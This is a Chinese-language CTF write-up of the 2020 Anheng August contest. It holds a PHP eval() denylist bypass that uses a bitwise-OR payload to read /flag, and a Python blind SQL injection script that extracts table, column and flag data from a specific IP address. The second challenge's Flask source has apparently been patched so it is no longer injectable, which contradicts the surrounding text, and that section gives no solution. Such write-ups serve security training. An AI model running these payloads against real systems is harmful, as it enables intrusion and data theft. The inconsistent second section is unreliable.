2020安恒8月月赛复现

月赛复现

0x01 ezrce

题目给了源码:

<?php
// Challenge source: POST input is run through a denylist and then eval()'d.
error_reporting(0);
show_source(__FILE__);
// $code comes straight from the request body, i.e. it is attacker-controlled.
$code=$_POST['code'];
// Each entry below is spliced verbatim into a regex; letters, digits and a few
// operator characters are listed, but '|' is not.
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','@','\~','\^','\[','\]','\&','\?','\<','\>','\*','1','2','3','4','5','6','7','8','9','0');
//This blacklist is so stupid.
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    // The 'i' modifier makes the single-letter entries match both cases.
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('you are not smart');
    }
}
// NOTE(review): eval() on untrusted input. No denylist makes this safe; the
// only real mitigation is to never evaluate user-supplied code.
eval("echo($code)");
?>

可以看到题目过滤了大小写字母、数字和 ~^& 等特殊符号,但是没有过滤 |,可以利用 | 来构造。

<?php
// For every character of $de, find a byte b such that (b | 0x60) equals that
// character (0x60 is '`', the urldecode("%60") below), collect those bytes and
// print them base64-encoded. Each target character and each byte found are
// also echoed as they are processed.
function convert($de){
    $de = str_split($de);
    $str = "";
    foreach($de as $chr){
        echo $chr;
        $i = 1;
        // Linear scan over byte values 1..254; the first match wins.
        while($i<255){
            //echo urldecode("%".$i)|urldecode("%60");
            if((chr($i)|urldecode("%60"))==$chr){
                echo chr($i);
                $str .= chr($i);
                break;
            }
            $i++;
        }


    }
    echo base64_encode($str);
    echo "\n";
}
// Encode both words the final payload is built from.
$de = "readfile";
$de1 = "/flag";
foreach (array($de, $de1) as $word) {
    convert($word);
}
// Output recorded by the author:
//EgUBBAYJDAU=
//BgwBBw==

将 base64 解码后发送:

code=('````````'|'	')('/````'|'/'));//
base64 Y29kZT0oJ2BgYGBgYGBgJ3wnEgUBBAYJDAUnKSgnL2BgYGAnfCcvBgwBBycpKTsvLw==

image-20200906223220648

0x02

题目给了源码:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, render_template, render_template_string, redirect, request, session, abort, send_from_directory
# Application object; the import name is used by Flask to locate resources.
app = Flask(import_name=__name__)


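# Tokens rejected in the ``name`` parameter (matched case-insensitively).
_JINJA_BLACKLIST = ['class', 'attr', 'mro', 'base',
    'request', 'session', '+', 'add', 'chr', 'ord', 'redirect', 'url_for', 'config', 'builtins', 'get_flashed_messages', 'get', 'subclasses', 'form', 'cookies', 'headers', '[', ']', '\'', '"', '{}']


def _safe_jinja(s):
    """Return True when *s* contains none of the blacklisted tokens."""
    lowered = s.lower()
    return not any(no.lower() in lowered for no in _JINJA_BLACKLIST)


@app.route("/")
def index():
    """Greet the caller by ``?name=``; without a name, return this file's source.

    ``name`` is user-controlled (``request.args``), so it is handed to Jinja as
    a template *variable* instead of being formatted into the template text:
    the engine escapes it and it can no longer introduce template syntax
    (the original ``%`` formatting made the user string part of the template,
    i.e. server-side template injection). The token blacklist is kept as an
    additional, backward-compatible filter; a name that fails it is replaced
    by the default, exactly as before.

    Returns:
        The rendered greeting page, or the source text when no name is given.
    """
    name = request.args.get('name')
    if not name:
        # Source disclosure is the challenge's intended behaviour; use a
        # context manager so the file handle is not leaked.
        with open(__file__) as src:
            return src.read()
    if not _safe_jinja(name):
        name = 'wendell'
    template = '''

<div class="center-content">
<p>Hello, {{ name }}</p>
</div>
<!--flag in /flag-->
<!--python3.8-->
'''
    # Data enters through the render context, never through the template string.
    return render_template_string(template, name=name)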


if __name__ == "__main__":
    # Listen on every interface on the challenge's port.
    bind_host, bind_port = '0.0.0.0', 5000
    app.run(host=bind_host, port=bind_port)

过滤了引号,常规的 request 也被过滤了。

0x03 安恒大学

注册的验证邮件

image-20200906224603906

http://183.129.189.60:10048/doAction.php?act=active&username=Mount4in&token=79e38f9896fbfd813240570a5a0de8de

逻辑条件不同时,回显也不同:

image-20200906225032634

image-20200906225102323

用脚本进行盲注:

# encoding=utf-8
# Boolean-based blind SQL injection against the account-activation endpoint:
# the `username` parameter is concatenated into the server's query, and the
# size of the response differs depending on whether the injected condition
# holds. (Python 2 script: note the `print` statement below.)
#
# Defensive note: the root cause is string-built SQL; a parameterized query
# for `username` removes it. On the wire the attack is a long run of
# near-identical requests differing only in two integers and a fixed token,
# which is the pattern to alert on.
import requests
import time

url="http://183.129.189.60:10048/doAction.php?"
# All requests go through a local intercepting proxy.
proxies = {
    "http": "http://127.0.0.1:8080",
}
flag=""

#erfenfa
# "erfenfa" (二分法) = binary search over printable ASCII 32..127, one
# character position per outer iteration; the outer bound of 200 is fixed
# rather than derived from the data length.
for i in range(1,200):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        # Stages of the extraction in order (tables, columns, then rows).
        # Only the last assignment is live; the earlier ones remain as a record.
        payload = "act=active&username=Mount4in' and ascii(mid((select group_concat(table_NAME) from information_schema.tableS where table_schema=database()),{},1))>{}--+-&token=79e38f9896fbfd813240570a5a0de8de"
        payload = "act=active&username=Mount4in' and ascii(mid((select group_concat(column_NAME) from information_schema.columnS where table_schema=database() and table_name='teachers'),{},1))>{}--+-&token=79e38f9896fbfd813240570a5a0de8de"
        payload = "act=active&username=Mount4in' and ascii(mid((select group_concat(f1aaaag) from teachers limit 1),{},1))>{}--+-&token=79e38f9896fbfd813240570a5a0de8de"
        payload = "act=active&username=Mount4in' and ascii(mid((select f1aaaag from teachers limit 11,1),{},1))>{}--+-&token=79e38f9896fbfd813240570a5a0de8de"
        url_1=url+payload.format(i,mid)
        print payload.format(i,mid)
        r=requests.get(url_1,proxies=proxies)
        #print(r.content)
        # Oracle: a response shorter than 100 bytes is taken to mean the
        # injected comparison was true, so the character is above `mid`.
        if int(r.headers['content-length']) < 100:
            low=mid+1
        else:
            high=mid
        mid=(low+high)//2
    flag+=chr(mid)
    print(flag)
# table student,teachers,users
# teachers: id,f1aaaag
image-20200906232104192

参考

https://www.gem-love.com/

https://rce.moe/****